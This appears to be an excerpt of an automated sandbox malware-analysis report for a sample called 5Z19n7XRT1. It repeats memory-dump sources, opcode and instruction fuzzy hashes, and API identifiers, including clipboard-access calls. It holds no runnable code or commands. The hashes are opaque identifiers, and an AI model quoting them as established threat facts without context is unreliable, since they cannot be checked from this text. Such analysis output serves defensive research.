                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: c0dbcf0a297be600f964884bc0c72e3d7d006dba3a211061d9d622b887688d22
                                                                                                                                                                                                                                                                          • Instruction ID: 608a5c001c9016f47e6d849a3a7bf8eb37f8ca910ed307557679ae7e480cd3ab
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0dbcf0a297be600f964884bc0c72e3d7d006dba3a211061d9d622b887688d22
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F31F139E146009AE325AB598C807377753FBC7300F68D13EE092A32E9DA38AC16874D
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 9879a937105e083bd9aef7d9b8e876d5a873d896f238b78d14b88aad6da131cd
                                                                                                                                                                                                                                                                          • Instruction ID: fdd1e800dfa4eb5b9066ef2130ba445994d89929f8c308095e7a0d58a1adf969
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9879a937105e083bd9aef7d9b8e876d5a873d896f238b78d14b88aad6da131cd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2731C53CA18501DAEB65BB19CC40B367B67FBC6304F68962ED0C1936A8DB34AC61CB14
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                                                          • Instruction ID: 4f1d9a8e55b01d87ed81b452fa3618ff49b1b83c19e4b1c484c24ed6b64955da
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78212921718B550BD728DE3988D132BF7D39BCB210F48D63EC5938B2D6CA34D9054688
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                                                          • Instruction ID: 9a85a5abcd99f592c4564a956b476160b708ee9b0f22e2b227e8c0448cc8e0f4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36212721B086910BD758DE3DC8D223BFBD39BDB118B18C63FC4A28B6D5CA30D9068608
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: fbddf629d58ab5b7ce3c6d341b6087eefabcc06d9ed1031e48f954126914271b
                                                                                                                                                                                                                                                                          • Instruction ID: 0b6b90f66fea6f4cd754c8f13be98c01af2b010cace34d3c23ed34297428df6a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbddf629d58ab5b7ce3c6d341b6087eefabcc06d9ed1031e48f954126914271b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D21F334614B019FD761CF28D880B27B7A3EBD6724F298668D5958B799DB30E842CB44
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 201c4f8f0819f68cd48f73e785265dbdbac7085615a68ae6b401f2b6715c5eb6
                                                                                                                                                                                                                                                                          • Instruction ID: c284272cbe1354c2bac86839248cf07ee5637eab11ef42c9faf85a1953e6744e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 201c4f8f0819f68cd48f73e785265dbdbac7085615a68ae6b401f2b6715c5eb6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B521217AA08225CFCB04DF24E88466AF3A0FF4A714F5A947ED5858B241D3309E90CF86
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: d6c3b5f98540c4edbfb2bfe1cd8306b70007439d23ccf1357e9be793c2fe8105
                                                                                                                                                                                                                                                                          • Instruction ID: d3efd499d3fbc33036e2032367fc91d0155dae543bbe3474a39f1f7b468c3dc9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6c3b5f98540c4edbfb2bfe1cd8306b70007439d23ccf1357e9be793c2fe8105
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A11B273F2A92107F3549E369C9C21B6352E7C531471A0535D941A72C1CA79F902E168
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 180171F160030187EB22AE6585C1B77B6F96F82715F18452EDB0A57300DB76E815CEB5
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 358e2d3b4c42a0c731e3efba7596486553403020c12b89a5f8a1758b9ddfefcd
                                                                                                                                                                                                                                                                          • Instruction ID: d3f395a3666704a597fe5cd152006ad51eb89866d7b0aff70ef20e2f81c0ad7d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 358e2d3b4c42a0c731e3efba7596486553403020c12b89a5f8a1758b9ddfefcd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50112B7D6042005BD3509F29DD80E3BB7EAEBD6700F36D43EE68057251DB30C8529756
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                                                                                                                                                                          • Instruction ID: 78b4a12427cc173d586094b37f3e700b38d0ff2ce6b24877113fcbe6adf3e26f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D71127717507404FD3189F25CCD2A637772ABC6314705893DB8519BBD3C67CAC0587A8
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390625549.00000000008B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 008B8000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_8b8000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                                          • Instruction ID: 3201d4b93ec8a4704584c9aa5d02eabf5b7041b9fd4ac8f476e8d0f31699de43
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3115A72340500AFDB54EE59DC81FE673EAFB89360B298065EE48CB316D676E802C760
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                                                                                                                                                                          • Instruction ID: 96776e6ca58e4aa10d5ba030708700e1f4611ba1bbc7aad69bbda72d62d4017c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD11E7747407804FD7158F28CCD5E627B63AB86318719853EA8429BB92C66CAC05CB64
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                                                          • Instruction ID: 0e8f66d183fe9e14be1779e28ad330ba7fcea72684f28741df0ac43413b1dcca
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5611A071608341ABD724DF29DDA077FBBE2EBC6254F15AE2CE59653791C630C841CB0A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                          • Instruction ID: 316fab75cdca8c204f77335740380c5cf636f58c06b371094cabf143150724a7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0301D676A106048FDF21CF24C904BAB37F9FB86216F4555B6D90AD7381E774A941CB90
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
                                                                                                                                                                                                                                                                          • Instruction ID: 36e37f5184ae6b5f12f1d3ae35ca6bd396f784eb5bf305c7c25848572748988b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20F06DB5E0C3808BC718CF28C44066AFBE5AB9A700F10A93ED48AA3341DB31D545CB4A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
                                                                                                                                                                                                                                                                          • Instruction ID: dafb754127db889cc387327b81ff0c84183e6fb29f7d1198a0a26455a67b0274
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28F069B410D3919FC300DF29D29051BFFE0ABD5318F64EA5CE8DA5B212D334C5028B4A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
                                                                                                                                                                                                                                                                          • Instruction ID: 26823722f3a6afcc10447d79cbf8b06261be6e3c3bcefc34e32834821d37eed0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4F0EDB5A88301BAF6248A00DD43F67B6A89755B04F301519B344790E1E5E1F559870E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
                                                                                                                                                                                                                                                                          • Instruction ID: bf3276d5db2ddd71b26ab661fc93688d98b36442342a27f76758d7edce35ef5b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52F0EDB5A88301BEF6249A01CC43F6BB6B49B55B04F30152DB344790E0F5E1B5498B0E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                          • Instruction ID: fe1efda9bcc16308283c5424634e62067ac2dc8fe4a9505e7820fcb65e305570
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1F0A735B456808BE704CF38D82155BBBE2E38B324F185A7DD681D3751D639C8018609
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                          • Instruction ID: e9e37191ca131b7bd35de4a38a45ac0981d22013e653bb1db83e87ad9d4c0b5e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7F0A739B456808BE704CF38E82195BBBE2E387228F145A7DD641D3751DB39C8018605
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
                                                                                                                                                                                                                                                                          • Instruction ID: 125372f5d3b68d82b85b5642a72c563733b032824caca2ff8a440a1607dfe248
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5D05E2590C67A824A2B4E1805501FEA72A4F03515B0B75E6DCE1BF682DBE6C9476278
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
                                                                                                                                                                                                                                                                          • Instruction ID: 979b3066809f2b39c8d4e254b46c6f556eea9d2a5e27a8b6f776bea0b7d6dcb5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AB002759486418FC644DF18D584974F7F5AB0B211F1564549589E7222D220D8408A19
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
• String ID: ($P$W$]$j$x
• API String ID: 2832541153-1642767450
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID: Variant$ClearInit
• String ID: L
• API String ID: 2610073882-2909332022
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID: Variant$ClearInit
• String ID: L
• API String ID: 2610073882-2909332022
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID: MetricsSystem
• String ID:
• API String ID: 4116985748-3916222277
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID: FreeLibrary
• String ID: #v
• API String ID: 3664257935-554117064